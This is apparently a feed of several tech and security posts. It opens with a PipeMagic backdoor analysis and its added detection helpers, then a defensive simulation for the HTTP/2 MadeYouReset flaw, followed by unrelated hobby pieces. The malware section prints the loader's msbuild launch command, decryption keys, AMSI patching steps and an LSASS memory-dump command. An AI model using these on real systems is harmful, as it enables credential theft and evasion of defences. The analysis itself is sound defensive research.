This report is the result of a joint investigation with the head of vulnerability research group at BI.ZONE, in which we traced the evolution of PipeMagic – from its first detection in 2022 to new incidents in 2025 – and identified key changes in its operators’ tactics. Our colleagues at BI.ZONE, in turn, conducted a technical analysis of the CVE-2025-29824 vulnerability itself.

Background


PipeMagic is a backdoor we first detected in December 2022 while investigating a malicious campaign involving RansomExx. The victims were industrial companies in Southeast Asia. To penetrate the infrastructure, the attackers exploited the CVE-2017-0144 vulnerability. The backdoor’s loader was a trojanized version of Rufus, a utility for formatting USB drives. PipeMagic supported two modes of operation – as a full-fledged backdoor providing remote access, and as a network gateway – and enabled the execution of a wide range of commands.

In October 2024, organizations in Saudi Arabia were hit by a new wave of PipeMagic attacks. This time, rather than exploiting vulnerabilities for the initial penetration, the attackers used a fake ChatGPT client application as bait. The fake app was written in Rust, using two frameworks: Tauri for rendering graphical applications and Tokio for asynchronous task execution. However, it had no user functionality – when launched, it simply displayed a blank screen.

MD5: 60988c99fb58d346c9a6492b9f3a67f7
File name: chatgpt.exe

Blank screen of the fake application

At the same time, the application extracted a 105,615-byte AES-encrypted array from its code, decrypted it, and executed it. The result was a shellcode loading an executable file. To hinder analysis, the attackers hashed API functions using the FNV-1a algorithm, with the shellcode dynamically resolving their addresses via GetProcAddress. Next, memory was allocated, necessary offsets in the import table were relocated, and finally, the backdoor’s entry point was called.

One unique feature of PipeMagic is that it generates a random 16-byte array used to create a named pipe formatted as: \\.\pipe\1.<hex string>. After that, a thread is launched that continuously creates this pipe, attempts to read data from it, and then destroys it. This communication method is necessary for the backdoor to transmit encrypted payloads and notifications. Meanwhile, the standard network interface with the IP address 127.0.0.1:8082 is used to interact with the named pipe.

To download modules (PipeMagic typically uses several plugins downloaded from the C2 server), attackers used a domain hosted on the Microsoft Azure cloud provider, with the following name: hxxp://aaaaabbbbbbb.eastus.cloudapp.azure[.]com.

PipeMagic in 2025


In January 2025, we detected new infections in Saudi Arabia and Brazil. Further investigation revealed connections to the domain hxxp://aaaaabbbbbbb.eastus.cloudapp.azure[.]com, which suggested a link between this attack and PipeMagic. Later, we also found the backdoor itself.

Initial loader
MD5: 5df8ee118c7253c3e27b1e427b56212c
File name: metafile.mshi

In this attack, the loader was a Microsoft Help Index File. Usually, such files contain code that reads data from .mshc container files, which include Microsoft help materials. Upon initial inspection, the loader contains obfuscated C# code and a very long hexadecimal string. An example of executing this payload:
c:\windows\system32\cmd.exe "/k c:\windows\microsoft.net\framework\v4.0.30319\msbuild.exe c:\windows\help\metafile.mshi"
Contents of metafile.mshi

The C# code serves two purposes – decrypting and executing the shellcode, which is encrypted with the RC4 stream cipher using the key 4829468622e6b82ff056e3c945dd99c94a1f0264d980774828aadda326b775e5 (hex string). After decryption, the resulting shellcode is executed via the WinAPI function EnumDeviceMonitor. The first two parameters are zeros, and the third is a pointer to a function where the pointer to the decrypted shellcode is inserted.

The injected shellcode is executable code for 32-bit Windows systems. It loads an unencrypted executable embedded inside the shellcode itself. For dynamically obtaining system API addresses, as in the 2024 version, export table parsing and FNV-1a hashing are used.
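An analyst-side helper for the API hashing described above, added here as an example and not taken from the report or the sample: it builds a reverse table from FNV-1a hashes to export names so hash constants found in the shellcode can be labelled. The 32-bit variant, the standard offset basis and prime, and the sample export list are assumptions; the report does not give the exact parameters.

```python
"""Reverse lookup for FNV-1a API-name hashes found in a loader (analysis aid).

Assumed, not taken from the report: 32-bit FNV-1a with the standard offset
basis and prime, hashing the ASCII export name. Both constants are
parameters because samples often change them.
"""

FNV32_OFFSET = 0x811C9DC5  # standard 32-bit FNV offset basis
FNV32_PRIME = 0x01000193   # standard 32-bit FNV prime


def fnv1a32(data, offset=FNV32_OFFSET, prime=FNV32_PRIME):
    """FNV-1a: XOR the byte in first, then multiply (FNV-1 does the reverse)."""
    h = offset
    for byte in data:
        h ^= byte
        h = (h * prime) & 0xFFFFFFFF
    return h


def name_variants(name):
    """Spellings a resolver might hash: as exported, lower-case, upper-case."""
    return list(dict.fromkeys((name, name.lower(), name.upper())))


def build_lookup(export_names, offset=FNV32_OFFSET, prime=FNV32_PRIME):
    """Map hash -> list of candidate names (a list, since hashes can collide)."""
    table = {}
    for name in export_names:
        for variant in name_variants(name):
            digest = fnv1a32(variant.encode("ascii"), offset, prime)
            bucket = table.setdefault(digest, [])
            if variant not in bucket:
                bucket.append(variant)
    return table


def annotate(constants, table):
    """Resolve constants seen in disassembly; an empty list means unresolved."""
    return {value: table.get(value, []) for value in constants}


# Constructed sample: a few export names of the kind a PE loader resolves.
# In practice, feed in the full export lists of the DLLs the shellcode walks.
SAMPLE_EXPORTS = [
    "GetProcAddress", "LoadLibraryA", "VirtualAlloc",
    "VirtualProtect", "CreateNamedPipeW",
]

if __name__ == "__main__":
    lookup = build_lookup(SAMPLE_EXPORTS)
    seen = [fnv1a32(b"VirtualAlloc"), fnv1a32(b"loadlibrarya"), 0x0BADF00D]
    for value, names in annotate(seen, lookup).items():
        print(f"{value:#010x} -> {names or 'unresolved'}")
```

If nothing resolves against a full export list, the sample most likely uses modified constants or hashes a different string form (for example a wide-character name), which is why both constants are exposed as parameters.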

Loader (ChatGPT)
MD5: 7e6bf818519be0a20dbc9bcb9e5728c6
File name: chatgpt.exe

In 2025, we also found PipeMagic loader samples mimicking a ChatGPT client. This application resembles one used in campaigns against organizations in Saudi Arabia in 2024. It also uses the Tokio and Tauri frameworks, and judging by copyright strings and PE header metadata, the executable was built in 2024, though it was first discovered in the 2025 campaign. Additionally, this sample uses the same version of the libaes library as the previous year’s attacks. Behaviorally and structurally, the sample is also similar to the application seen in October 2024.

Decrypting the payload using AES

Loader using DLL hijacking
MD5: e3c8480749404a45a61c39d9c3152251
File name: googleupdate.dll

In addition to the initial execution method using a .mshi file launched through msbuild, the attackers also used a more popular method involving decrypting the payload and injecting it with the help of an executable file that does not require additional utilities to run. The executable file itself was legitimate (in this campaign we saw a variant using the Google Chrome update file), and the malicious logic was implemented through a library that it loads, using the DLL hijacking method. For this, a malicious DLL was placed on the disk alongside the legitimate application, containing a function that the application exports.

It is worth noting that in this particular library sample, the exported functions were not malicious – the malicious code was contained in the initialization function (DllMain), which is always called when the DLL is loaded because it initializes internal structures, file descriptors, and so on.

First, the loader reads data from an encrypted file – the attackers pass its path via command-line arguments.

Reading the payload file

Next, the file contents are decrypted using the symmetric AES cipher in CBC mode, with the key 9C3BA5B2D3222FE5863C14D51340D7F9 and the initialization vector (IV) 221BA50915042098AF5F8EE40E5559C8.

The library deploys the decrypted code into memory and transfers control to it, and the original file is subsequently deleted. In the variants found during analysis, the payload was a shellcode similar to that discovered in the 2024 attacks involving a ChatGPT client.

Deployed PE

MD5: 1a119c23e8a71bf70c1e8edf948d5181
File name

In all the loading methods described above, the payload was an executable file for 32-bit Windows systems. Interestingly, in all cases, this file supported graphical mode, although it did not have a graphical user interface. This executable file is the PipeMagic backdoor.

At the start of its execution, the sample generates 16 random bytes to create the name of the pipe it will use. This name is generated using the same method as in the original PipeMagic samples observed in 2022 and 2024.

Creating a pipe with a pre-generated name

The sample itself doesn’t differ from those we saw previously, although it now includes a string with a predefined pipe path: \\.\pipe\magic3301. However, the backdoor itself doesn’t explicitly use this name (that is, it doesn’t interact with a pipe by that name).

Additionally, similar to samples found in 2022 and 2024, this version creates a communication pipe at the address 127.0.0.1:8082.

Discovered modules


During our investigation of the 2025 attacks, we discovered additional plugins used in this malicious campaign. In total, we obtained three modules, each implementing different functionality not present in the main backdoor. All the modules are executable files for 32-bit Windows systems.

Asynchronous communication module


This module implements an asynchronous I/O model. For this, it uses an I/O queue mechanism and I/O completion ports.

Processing core commands

Immediately upon entering the plugin, command processing takes place. At this stage, five commands are supported:

Command ID    Description
0x1           Initialize and create a thread that continuously receives changes from the I/O queue
0x2           Terminate the plugin
0x3           Process file I/O
0x4           Terminate a file operation by the file identifier
0x5           Terminate all file operations

Although I/O changes via completion ports are processed in a separate thread, the main thread waits for the current file operation to complete – so this model is not truly asynchronous.

Getting the I/O queue status

If the command with ID 0x3 (file I/O processing) is selected, control is transferred to an internal handler. This command has a set of subcommands described below. Together with the subcommand, this command has a length of at least 4 bytes.

Command ID    Description
0x1           Open a file in a specified mode (read, write, append, etc.)
0x3           Write to a file
0x4, 0x6      Read from a file
0x5           Change the flag status
0x7           Write data received from another plugin to a file
0x9           Close a file
0xB           Dump all open files

The command with ID 0x5 is presumably implemented to set a read error flag. If this flag is set, reading operations become impossible. At the same time, the module does not support commands to clear the flag, so effectively this command just blocks reading from the file.

Setting the read error flag

To manage open files, the file descriptors used are stored in a doubly linked list in global memory.

Loader


This module, found in one of the infections, is responsible for injecting additional payloads into memory and executing them.

At startup, it first creates a pipe named \\.\pipe\test_pipe20.%d, where the format string includes a unique identifier of the process into which the code is injected. Then data from this pipe is read and sent to the command handler in an infinite loop.

The unique command ID is contained in the first four bytes of the data and can have the following possible values:

Command ID    Description
0x1           Read data from the pipe or send data to the pipe
0x4           Initiate the payload

The payload is an executable file for 64-bit Windows systems. The command handler parses this file and extracts another executable file from its resource section. This extracted file then undergoes all loading procedures – obtaining the addresses of imported functions, relocation, and so on. In this case, to obtain the system method addresses, simple name comparison is used instead of hashing.

The executable is required to export a function called DllRegisterService. After loading, its entry point is called (to initialize internal structures), followed by this function. It provides an interface with the following possible commands:

Command ID    Description
0x1           Initialize
0x2           Receive data from the module
0x3           Callback to get data from the payload

Injector


This module is also an executable file for 32-bit Windows systems. It is responsible for launching the payload – an executable originally written in C# (.NET).

First, it creates a pipe named \\.\pipe\0104201.%d, where the format string includes a unique identifier of the process in which the module runs.

The sample reads data from the pipe, searching for a .NET application inside it. Interestingly, unlike other modules, reading here occurs once rather than in a separate thread.

Before loading the received application, the module performs another important step. To prevent the payload from being detected by the AMSI interface, the attackers first load a local copy of the amsi library. Then they enable writing into the memory region containing the functions AmsiScanString and AmsiScanBuffer and patch them. For example, instead of the original code of the AmsiScanString function, a stub function is placed in memory that always returns 0 (thus marking the file as safe).

After this, the sample loads the mscoree.dll library. Since the attackers do not know the target version of this library, during execution they check the version of the .NET runtime installed on the victim’s machine. The plugin supports versions 4.0.30319 and 2.0.50727. If one of these versions is installed on the device, the payload is launched via the _Assembly interface implemented in mscoree.dll.

Post-exploitation


Once a target machine is compromised, the attackers gain a wide range of opportunities for lateral movement and obtaining account credentials. For example, we found in the telemetry a command executed during one of the infections:
dllhost.exe $system32\dllhost.exe -accepteula -r -ma lsass.exe $appdata\FoMJoEqdWg
The executable dllhost.exe is a part of Windows and does not support command-line flags. Although telemetry data does not allow us to determine exactly how the substitution was carried out, in this case the set of flags is characteristic of the procdump.exe file (ProcDump utility, part of the Sysinternals suite). The attackers use this utility to dump the LSASS process memory into the file specified as the last argument (in this case, $appdata\FoMJoEqdWg).

Later, having the LSASS process memory dump, attackers can extract credentials from the compromised device and, consequently, attempt various lateral movement vectors within the network.

It is worth noting that a Microsoft article about attacks using CVE-2025-29824 mentions exactly the same method of obtaining LSASS memory using the procdump.exe file.
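A detection sketch for the two command lines quoted in this report (the msbuild launch of metafile.mshi and the ProcDump-style dump of LSASS run under the name dllhost.exe), added here as an example and not part of the original research. The event field names, image paths, rule labels and the benign events are assumptions constructed for illustration.

```python
"""Flag two process-creation patterns described in the report.

Event field names ("image", "command_line") are assumptions; map them to
whatever your EDR or Sysmon pipeline emits.
"""
import re
from ntpath import basename

# ProcDump's full-memory-dump switch and an LSASS target on the same line.
FULL_DUMP = re.compile(r"(?<!\S)[-/]ma(?!\S)", re.I)
LSASS_TARGET = re.compile(r"(?<![\w.])lsass(\.exe)?(?![\w.])", re.I)
# MSBuild handed a .mshi (Microsoft Help Index) file as its project.
# Simplification: does not handle paths that contain spaces.
MSBUILD_MSHI = re.compile(r'msbuild\.exe"?\s+"?[^"\s]+\.mshi\b', re.I)


def classify(event):
    """Return the list of findings for one process-creation event."""
    image = basename(event["image"]).lower()
    cmd = event["command_line"]
    findings = []
    if FULL_DUMP.search(cmd) and LSASS_TARGET.search(cmd):
        # Same switches, different severity: a binary not named procdump*
        # that carries ProcDump switches is the renamed-tool case.
        if image.startswith("procdump"):
            findings.append("lsass-full-dump")
        else:
            findings.append("lsass-full-dump-renamed-tool")
    if MSBUILD_MSHI.search(cmd):
        findings.append("msbuild-mshi-project")
    return findings


def scan(events):
    """Return (index, findings) for every event that matched a rule."""
    hits = []
    for index, event in enumerate(events):
        findings = classify(event)
        if findings:
            hits.append((index, findings))
    return hits


# Constructed events. The command lines of events 0 and 1 are the two quoted
# in the report; image paths and the remaining events are made up.
SAMPLE_EVENTS = [
    {"image": r"C:\Windows\System32\dllhost.exe",
     "command_line": r"$system32\dllhost.exe -accepteula -r -ma lsass.exe "
                     r"$appdata\FoMJoEqdWg"},
    {"image": r"c:\windows\system32\cmd.exe",
     "command_line": r'c:\windows\system32\cmd.exe "/k c:\windows\microsoft.net'
                     r'\framework\v4.0.30319\msbuild.exe '
                     r'c:\windows\help\metafile.mshi"'},
    {"image": r"C:\Windows\System32\dllhost.exe",
     "command_line": r"C:\Windows\System32\dllhost.exe "
                     r"/Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}"},
    {"image": r"C:\BuildTools\MSBuild\Current\Bin\MSBuild.exe",
     "command_line": r"MSBuild.exe C:\src\app\app.csproj "
                     r"/p:Configuration=Release"},
    {"image": r"C:\Tools\procdump64.exe",
     "command_line": r"procdump64.exe -accepteula -ma lsass.exe C:\ir\lsass.dmp"},
]

if __name__ == "__main__":
    for index, findings in scan(SAMPLE_EVENTS):
        print(index, findings)
```

Matching on the switches rather than the file name is what catches the renamed binary; comparing the image's original file name from its PE version resource, where telemetry records it, is a useful second check.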

Takeaways


The repeated detection of PipeMagic in attacks on organizations in Saudi Arabia and its appearance in Brazil indicate that the malware remains active and that the attackers continue to develop its functionality. The versions detected in 2025 show improvements over the 2024 version, aimed at persisting in victim systems and moving laterally within internal networks.

In the 2025 attacks, the attackers used the ProcDump tool renamed to dllhost.exe to extract memory from the LSASS process – similar to the method described by Microsoft in the context of exploiting vulnerability CVE-2025-29824. The specifics of this vulnerability were analyzed in detail by BI.ZONE in the second part of our joint research (in Russian).

IoCs


Domains
aaaaabbbbbbb.eastus.cloudapp.azure[.]com

Hashes
5df8ee118c7253c3e27b1e427b56212c metafile.mshi
60988c99fb58d346c9a6492b9f3a67f7 chatgpt.exe
7e6bf818519be0a20dbc9bcb9e5728c6 chatgpt.exe
e3c8480749404a45a61c39d9c3152251 googleupdate.dll
1a119c23e8a71bf70c1e8edf948d5181
bddaf7fae2a7dac37f5120257c7c11ba

Pipe names
\\.\pipe\0104201.%d
\\.\pipe\1.<16-byte hexadecimal string>
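
A matcher for the pipe names listed above and in the module descriptions, for use over pipe-creation telemetry; it is an added example, not part of the original report. It assumes the 16-byte array is rendered as 32 hex characters and that the "%d" identifier is the PID of the creating process; the rule labels, prefixes handled and sample events are constructed.

```python
"""Match named-pipe creation events against the pipe names in the report.

Assumptions: the random 16-byte array is rendered as 32 hex characters, and
the "%d" process identifier is the PID of the process that creates the pipe.
"""
import re

# Prefixes seen in different telemetry sources, longest first.
_PREFIXES = ("\\device\\namedpipe\\", "\\\\.\\pipe\\", "\\??\\pipe\\", "\\")

RULES = [
    ("pipemagic-random-pipe", re.compile(r"1\.[0-9a-f]{32}", re.I)),
    ("pipemagic-loader-module", re.compile(r"test_pipe20\.(?P<pid>\d+)")),
    ("pipemagic-injector-module", re.compile(r"0104201\.(?P<pid>\d+)")),
    # Present as a string in the 2025 sample; the report says it is not used.
    ("pipemagic-embedded-string", re.compile(r"magic3301", re.I)),
]


def normalize(pipe_name):
    """Strip whichever pipe-namespace prefix the log source includes."""
    name = pipe_name.strip()
    lowered = name.lower()
    for prefix in _PREFIXES:
        if lowered.startswith(prefix):
            return name[len(prefix):]
    return name


def match(pipe_name, pid=None):
    """Return {"rule", "pid_match"} for a known pipe name, else None.

    pid_match is True/False when the name carries a numeric suffix and the
    creating PID is known, and None when the comparison does not apply.
    """
    name = normalize(pipe_name)
    for label, pattern in RULES:
        found = pattern.fullmatch(name)
        if found:
            suffix = found.groupdict().get("pid")
            if suffix is None or pid is None:
                pid_match = None
            else:
                pid_match = int(suffix) == pid
            return {"rule": label, "pid_match": pid_match}
    return None


def scan(events):
    """events: iterable of (pid, pipe_name). Return the matching ones."""
    hits = []
    for pid, pipe_name in events:
        result = match(pipe_name, pid)
        if result:
            hits.append((pid, pipe_name, result))
    return hits


# Constructed pipe-creation events (PID, pipe name as logged).
SAMPLE_EVENTS = [
    (4312, r"\\.\pipe\1.0123456789abcdef0123456789ABCDEF"),
    (4312, r"\test_pipe20.4312"),
    (900, r"\\.\pipe\0104201.77"),
    (1204, r"\Device\NamedPipe\magic3301"),
    (2220, r"\mojo.2220.5512.1837462"),       # benign look-alike
    (2220, r"\\.\pipe\1.0123456789abcdef"),   # too short for 16 bytes
]

if __name__ == "__main__":
    for pid, pipe_name, result in scan(SAMPLE_EVENTS):
        print(pid, pipe_name, result)
```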


securelist.com/pipemagic/11727…


China’s Great Solar Wall is a Big Deal


An overhead image of the Kubuqi Desert Great Solar Wall. It shows a series of clusters of bluish solar panels arranged throughout a light brown and dark brown desert. One of the arrays contains an image of a horse made of solar panels.

Data centers and the electrification of devices that previously ran on fossil fuels are driving increased demand for electricity around the world. China is addressing this with a megaproject that is a new spin on their most famous piece of infrastructure.

At 250 miles long with a generating capacity of 100 GW, the Great Solar Wall will be able to provide enough energy to power Beijing, although the energy will more likely be used to power industrial operations also present in the Kubuqi Desert. NASA states, “The Kubuqi’s sunny weather, flat terrain, and proximity to industrial centers make it a desirable location for solar power generation.” As an added bonus, previous solar installations in China have shown that they can help combat further desertification by locking dunes in place and providing shade for plants to grow.

Engineers must be having fun with the project as they also designed the Guinness World Record holder for the largest image made of solar panels with the Junma Solar Power Station (it’s the horse in the image above). The Great Solar Wall is expected to be completed by 2030 with 5.4 GW already installed in 2024.

Want to try solar yourself on a slightly smaller scale? How about this solar thermal array inspired by the James Webb Telescope or building a solar-powered plane?


hackaday.com/2025/08/18/chinas…


MadeYouReset Vulnerability in HTTP/2 Can Be Exploited in Powerful DDoS Attacks


A vulnerability named MadeYouReset has been discovered in several HTTP/2 implementations. It can be exploited to launch powerful DDoS attacks.

Researchers from Imperva, Deepness Lab and Tel Aviv University write that the vulnerability has been assigned the primary identifier CVE-2025-8671. However, the bug affects products from various vendors, many of which have already released their own CVEs and security bulletins: Apache Tomcat (CVE-2025-48989), F5 BIG-IP (CVE-2025-54500), Netty (CVE-2025-55163), Vert.x and Varnish.

It has also been reported that solutions from Mozilla, Wind River, Zephyr Project, Google, IBM and Microsoft are vulnerable, which could expose vulnerable systems to risk in one way or another.

“MadeYouReset bypasses the standard server limit of 100 concurrent HTTP/2 requests per client TCP connection,” the experts explain. “This limit is designed to protect against DoS attacks by restricting the number of concurrent requests a client can send. With MadeYouReset, an attacker can send thousands of requests, creating DoS conditions for legitimate users and, in some implementations, this can lead to crashes and out-of-memory conditions.”

The MadeYouReset vulnerability is similar to the Rapid Reset and Continuation Flood issues, which were exploited in powerful zero-day DDoS attacks.

Like those two attacks, which abuse the RST_STREAM and CONTINUATION frames of the HTTP/2 protocol, MadeYouReset builds on Rapid Reset and bypasses the protection that limits the number of streams a client can cancel via RST_STREAM.

The attack exploits the fact that the RST_STREAM frame is used both for client-initiated cancellation and for signalling stream errors. MadeYouReset works by sending specially crafted frames that cause unexpected protocol violations, forcing the server to reset the stream via RST_STREAM.

“For MadeYouReset to trigger, a stream must begin with a valid request that the server starts working on, and then produce an error so that the server resorts to RST_STREAM while the backend continues to process the response,” the researchers write. “By crafting certain invalid control frames or breaking the protocol at the right moment, we can force the server to use RST_STREAM on a stream that already contained a valid request.”

In addition, Imperva points out that MadeYouReset blends in with normal traffic, making such attacks hard to detect.

The experts suggest a number of measures that should help protect against MadeYouReset, including stricter protocol validation, stricter stream state tracking to reject invalid transitions, connection-level rate control, and the deployment of anomaly detection and behavioural monitoring systems.
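The connection-level rate control and stricter stream accounting recommended above, as an added example that is not code from the researchers or from any affected product. It models one HTTP/2 connection at the level of stream lifecycle events only; the class, the budget values and the replayed request patterns are assumptions chosen for illustration.

```python
from collections import deque


class ConnectionGuard:
    """Accounting for one HTTP/2 connection (hypothetical helper, times in ms)."""

    def __init__(self, hardened, max_concurrent=100, reset_budget=20, window_ms=10_000):
        self.hardened = hardened
        self.max_concurrent = max_concurrent
        self.reset_budget = reset_budget
        self.window_ms = window_ms
        self.protocol_open = set()  # streams HTTP/2 still counts as open
        self.backend_busy = set()   # streams whose request is still being processed
        self.resets = deque()       # timestamps of resets charged to the client
        self.closed = False

    def on_request(self, stream_id):
        if self.closed:
            return "connection_closed"
        # Naive: the limit is checked against protocol-open streams only.
        # Hardened: a stream keeps its slot until the backend has finished.
        in_use = self.backend_busy if self.hardened else self.protocol_open
        if len(in_use) >= self.max_concurrent:
            return "refused"
        self.protocol_open.add(stream_id)
        self.backend_busy.add(stream_id)
        return "accepted"

    def on_reset(self, stream_id, now_ms, sender):
        """sender: 'client', or 'server' for a reset forced by a client protocol error."""
        self.protocol_open.discard(stream_id)  # RST_STREAM closes the stream either way
        # Hardened: server resets caused by the client spend the same budget
        # as resets the client sends itself.
        if sender == "client" or self.hardened:
            self.resets.append(now_ms)
        while self.resets and now_ms - self.resets[0] > self.window_ms:
            self.resets.popleft()
        if len(self.resets) > self.reset_budget:
            self.closed = True  # a real server would send GOAWAY and drop the connection

    def on_backend_done(self, stream_id):
        self.backend_busy.discard(stream_id)
        self.protocol_open.discard(stream_id)


def simulate(guard, requests, reset_each, backend_ms, interval_ms=1):
    """Replay a constructed request pattern; return (accepted, peak_backend_busy, closed)."""
    pending = deque()  # (finish_time_ms, stream_id); FIFO because backend_ms is constant
    accepted = peak = 0
    for i in range(requests):
        now = i * interval_ms
        while pending and pending[0][0] <= now:
            guard.on_backend_done(pending.popleft()[1])
        stream_id = 2 * i + 1  # client-initiated streams use odd identifiers
        if guard.on_request(stream_id) != "accepted":
            continue
        accepted += 1
        pending.append((now + backend_ms, stream_id))
        peak = max(peak, len(guard.backend_busy))
        if reset_each:
            guard.on_reset(stream_id, now, sender="server")
    return accepted, peak, guard.closed


def demo():
    """Run the three constructed scenarios and return their results by name."""
    return {
        "naive_under_reset_pattern": simulate(ConnectionGuard(False), 1000, True, 5000),
        "hardened_under_reset_pattern": simulate(ConnectionGuard(True), 1000, True, 5000),
        "hardened_normal_client": simulate(ConnectionGuard(True), 1000, False, 50),
    }


if __name__ == "__main__":
    for name, result in demo().items():
        print(name, result)
```

The naive accounting lets backend work grow far past the 100-stream limit because every reset stream stops counting as open, while the hardened accounting caps it and closes the connection without affecting a client that lets its requests complete.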

The article MadeYouReset Vulnerability in HTTP/2 Can Be Exploited in Powerful DDoS Attacks comes from il blog della sicurezza informatica.


Cracking Abandonware DRM Like It’s 1999


As long as there have been games, there have been crackers breaking their copy protections. “Digital Rights Management” or DRM, is a phrase for copy protection coined near the end of the 1990s, and subverted shortly thereafter. But how? [Nathan Baggs] shows us what it took to be a cracker in the year 2000, as the first step to get an old game going again turned out to be cracking it.

The game in question is “Michelin Rally Masters: Race of Champions” by DICE, a studio that was later subsumed by EA and is today best known as the developers of the Battlefield franchise. The game as acquired from an abandonware site does not run in a virtual machine, and after a little de-obfuscation of the code causing the crash, [Nathan] discovers LaserLock is to blame. LaserLock was a DRM tool to lock down a game to its original CD-ROM that dates all the way back to 1995. Counters to LaserLock were probably well-known in the community back in the day, but in 2025, [Nathan] walks us through attempting to crack it from first principles.

We won’t spoil the whole assembly-poking adventure, but the journey does involve unboxing an original CD to be able to compare what’s happening when the disc is physically present compared to running from the ISO. It’s tedious work and can only be partially automated. Because it did prove so involved, [Nathan]’s original aim — getting the game to work in Windows 11 — remains unfulfilled so far.

Perhaps he’d have had better luck if he’d been listening to the appropriate music. Frustrating DRM isn’t always this hard; sometimes all you needed was a paperclip.

youtube.com/embed/D8VZdHS51cU?…


hackaday.com/2025/08/17/cracki…


Practical Guide to Pedal-Powered Electrical Generators


An adult human can produce about 100 Wh of mechanical power whilst cycling, which is a not inconsiderable amount if you can convert that to electricity with reasonable efficiency. In a recent article on EDN [T. K. Hareendran] goes over a few ways that you can turn the rotary motion of pedaling into usable electrical power.
Suggested voltage regulator for pedal-powered generator. (Credit: T. K. Hareendran, EDN)
A basic form of this is already widely deployed, in the form of a bicycle dynamo that is used to supply power to the front and rear lights. These typically put out something like 3 watts at 6 VAC, so with a simple bridge rectifier and some smoothing this can power a pretty bright LED or two. To get more out of it, you need to use a more capable generator, which can also be a brushed or brushless DC motor in a pinch, with ideally a flywheel in the whole contraption to balance out variations in the human power input.

As for the potential here, a commercial solution like the K-Tor Power Box 50 is specified for ‘greater than’ 50 Watt, with a nominal 12 VDC output. Its target market is emergency generators, with enough capability to keep phones, radios and flashlights charged. Considering the $435 asking price, there is probably quite a lot of DIY potential well within that price bracket, especially if you already have many of the requisite parts lying around.

Fortunately this is not a new idea, with us having covered using bicycles as well as gym equipment to generate electricity in the past.


hackaday.com/2025/08/17/practi…


Hackaday Links: August 17, 2025


We’ve studiously avoided any mention of our latest interstellar visitor, 3I/Atlas, on these pages, mainly because of all the hoopla in the popular press about how Avi Loeb thinks it’s aliens, because of course he does. And we’re not saying it’s aliens either, mainly because we’d never be lucky enough to be alive during an actual alien invasion — life just hasn’t historically been that kind to us. So chances are overwhelming that 3I/Atlas is just a comet, but man, it’s doing its level best to look like it’s not, which means it’s time to brave the slings and arrows and wade into this subject.

The number of oddities surrounding 3I/Atlas just keeps growing, from its weird Sun-directed particle stream to its extreme speed, not to mention a trajectory through the solar system that puts it just a fraction of an astronomical unit from two of the three planets within the “Goldilocks Zone” of our star — ignore the fact that at an estimated seven billion years old, 3I/Atlas likely would have started its interstellar journey well before our solar system had even started forming. Still, it’s the trajectory that intrigues us, especially the fact that it’s coming in at a very shallow angle to the ecliptic, and seems like it will cross that imaginary plane almost exactly when it makes its closest approach to the Sun on October 29, which just coincidentally happens to be at the very moment Earth is exactly on the opposite side of our star. We’ll be as far as possible from the action on that date, with the comet conveniently lost in the glare of the Sun. Yes, there’s talk of re-tasking some of our spacecraft around Mars or in the Jovian system to take a peek when 3I/Atlas passes through their neighborhoods, but those are complicated affairs that show no sign of bearing fruit in the short time left before the comet heads back out into the Deep Dark. Too bad; we’d really love an up-close and personal look at this thing.

Starbucks campers, beware — the company would really prefer you don’t set up a full office in their stores. At least in South Korea, that is, where patrons have taken things to extremes by bringing full-sized desktop computers and even printers to the cozy confines of their local Starbucks. The company is fighting back against the practice in the most generic way possible, implementing a policy that bans patrons from bringing “bulky items” with them when the caffeine urge strikes. Mind you, we’ve done plenty of work out in the wild. Nearly the whole first year of Hackaday articles from this particular author were written on a humble Chromebook inside either a Starbucks or a Dunkin’ — with heavy emphasis on the latter because of their vastly superior hot cocoa. So we get the new rule, but it almost seems like Starbucks is missing an opportunity here. Why don’t they just lean into it and install a metered printer in each store?

This story gave us a bit of pause when we first read it, and we’re not sure if this is a case of technical ignorance on the part of the UK government, or us. Guidance published this week by the Department for Environment, Food, and Rural Affairs asks UK citizens to delete old emails and images from cloud-based services due to the current “nationally significant” drought conditions. Apparently, this will save water somehow, presumably by reducing the cooling load on the data centers that house these files. If you’re confused by this, we are too; do the policy wonks think that the hard drives that store these files are water-cooled? Or perhaps that keeping those pictures from 2013 requires some CPU cycles, therefore generating heat that has to be removed? We suppose that’s possible, and that removing the temptation to gaze at photos from Aunt Winifred’s 99th birthday party would spare a few drops of water, but then again, it was our impression that data centers aren’t just running cold water from the taps through their cooling units, but rather running closed-loop systems that consume as little fresh water as possible. We’re willing to be proven wrong, of course — data center cooling actually sounds like great fodder for an article — but on the face of it, this sounds like a government agency throwing something against the wall and seeing if it sticks.

We can’t say why for sure, but the idea of continental divides is unreasonably cool to us. Here in the US, we’ve got a couple of these imaginary geographic lines, the main one being the Atlantic-Pacific divide that roughly transects the continent north to south along the ridges and peaks of the Rocky Mountains. East of the line, water eventually flows into the Atlantic basin, while west of the line, rivers all flow into the Pacific. It’s a fascinating concept, one that’s captured beautifully by River Runner Global, an interactive GIS application that lets you trace the path of a virtual drop of water on its journey to the sea. It charts the rivers and streams of your drop’s journey, and the best part is the flyover of the terrain as it courses to the sea. Fair warning, it’s pretty resource hungry; it locked up our machine once while playing. But it’s worth the risk, in our opinion.

And finally, it’s factory tour time again here at Hackaday Links, and this time we’ve got a real treat: a full tour of Toyota Motors Manufacturing Texas, the San Antonio mega-plant that makes Tundra pickups and Sequoia SUVs. The factory produces one new vehicle every 67 seconds, starting from raw steel coil stock. The enormity of the presses used to stamp out body panels alone is worth the price of admission, as is the part where the entire body goes for a deep soak in a galvanizing tank to protect the metal. The level of automation is astounding, but it was surprising to see just how many people are still critical to the process. And extra points for the sneak-peek at the new Tundra color near the end. We’re not a fan, but it certainly does make a statement. Enjoy!

youtube.com/embed/En0Ft5GY-DU?…


hackaday.com/2025/08/17/hackad…


2025 One Hertz Challenge: A Flaming Oscillator and a New Take on the Candle Clock


On the left side of the image, three lit candles are positioned next to each other, so that the flames merge. On the right side, an oscilloscope screen is shown displaying an oscillating waveform.

Candle clocks were once an easy way to build a clock without using complex mechanical devices: just observe how quickly a thin candle burns down, mark an identical candle with periodic gradations, and you had a simple timer. These were the first candle-based timekeeping devices, but as [Tim]’s flicker-based oscillator demonstrates, they’re certainly not the only way to keep time with a flame.

Generally speaking, modern candles minimize flickering by using a wick that’s designed to balance the amount of wax and air drawn into the flame. However, when several candles are brought close together, their flames begin to interfere with each other, causing them to flicker in synchrony. The frequency of flickering is a function of gravity and flame diameter alone, so a bundle of three candles will flicker at a fairly constant frequency; in [Tim]’s case, it was about 9.9 Hz.

